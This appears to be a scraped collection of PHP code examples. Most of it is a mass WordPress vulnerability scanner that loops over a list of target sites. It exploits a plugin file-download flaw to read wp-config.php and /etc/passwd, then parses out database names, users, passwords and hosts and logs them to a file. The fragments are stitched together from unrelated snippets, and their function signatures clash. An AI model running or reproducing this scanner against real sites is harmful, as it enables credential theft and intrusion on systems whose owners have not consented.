function __listTarget($file)
{
    $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
    echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
    foreach ($tgt_ as $url) {
        echo "\n[+] [INFO] SCANNING : {$url} \n";
        __plus();
        $file['target'] = $url;
        __request($file) . __plus();
    }
}
Exemplo n.º 2
0
function __subProcess($params, $target)
{
    foreach ($params['exploit_model'] as $camp => $value) {
        $params['exploit'] = $value;
        $params['exploit_model'] = $camp;
        $params['host'] = $target;
        $rest = __request($params);
        __plus();
        if ($rest['dados_01']['http_code'] != 0) {
            break;
        }
    }
    __plus();
    $_SESSION["cont_ip"]++;
    if ($rest['dados_01']['http_code'] == 200) {
        //FOUND FILE
        $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}";
        echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n";
        $output_view = "{$style_var}  [ ! ]__[INFO][COD]: {$rest['dados_01']['http_code']}\n";
        $output_view .= "{$style_var}  [ ! ]__[INFO][IP/FILE]: {$params['host']}{$params['exploit']}\n";
        $output_view .= "{$style_var}  [ ! ]__[INFO][MODEL]: {$params['exploit_model']}\n";
        $output_view .= "{$style_var}  [ ! ]__[INFO][DETAILS_1]:  {$rest['dados_02']}\n{$_SESSION["c00"]}";
        $info_ip = __infoIP($rest['dados_01']['primary_ip']);
        $output_view .= "{$style_var}  [ ! ]__[INFO][DETAILS_2]:  {$info_ip}\n{$_SESSION["c00"]}";
        echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"];
        $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}";
        file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND);
        __plus();
    } else {
        //FILE NOT FOUND
        echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n";
        echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}";
    }
    echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"];
}
function __request($url, $plugin)
{
    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();
    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
    $corpo = curl_exec($objcurl);
    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
        return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();
    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
        //-----------------------------------------------------------------------------
        preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
        preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
        preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
        preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
        preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
        #FILE PASSWORD
        preg_match_all("(root:.*)", $corpo, $status['pwd1']);
        preg_match_all("(sbin:.*)", $corpo, $status['pwd2']);
        preg_match_all("(ftp:.*)", $corpo, $status['pwd3']);
        preg_match_all("(nobody:.*)", $corpo, $status['pwd4']);
        preg_match_all("(mail:.*)", $corpo, $status['pwd5']);
        //-----------------------------------------------------------------------------
        __plus();
        $res = "\n------------------------------------------------------------------------------------------------------------------\n0x " . date("h:m:s") . " [INFO][VULN]::     [ " . date("d-m-Y H:i:s") . " ]\n";
        $res .= "0x " . date("h:m:s") . " [INFO][VULN][DB]:: " . $status['DB_NAME'][0][0];
        $res .= "::" . $status['DB_USER'][0][0];
        $res .= "::" . $status['DB_PASSWORD'][0][0];
        $res .= "::" . $status['DB_HOST'][0][0];
        $res .= "::" . $status['DB_CHARSET'][0][0];
        $res .= preg_match("#root#i", $corpo) ? "\n0x " . date("h:m:s") . "[INFO][VULN][FILE_PASSWORD]::{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}" : NULL;
        $res .= "\n0x " . date("h:m:s") . " [INFO][VULN][URL]::{$url}{$plugin}";
        $res .= "\n------------------------------------------------------------------------------------------------------------------\n";
        print $res;
        $res = str_replace('', '', str_replace('', '', str_replace('', '', $res)));
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {
        print "\n0x " . date("h:m:s") . " [INFO][NOT VULN]:: {$url}{$plugin} \n";
    }
    curl_close($objcurl);
    __plus();
}
Exemplo n.º 4
0
function request($action, $post = array(), &$error)
{
    if (!function_exists('__request')) {
        jfunc('request');
    }
    return __request($action, $post, $error);
}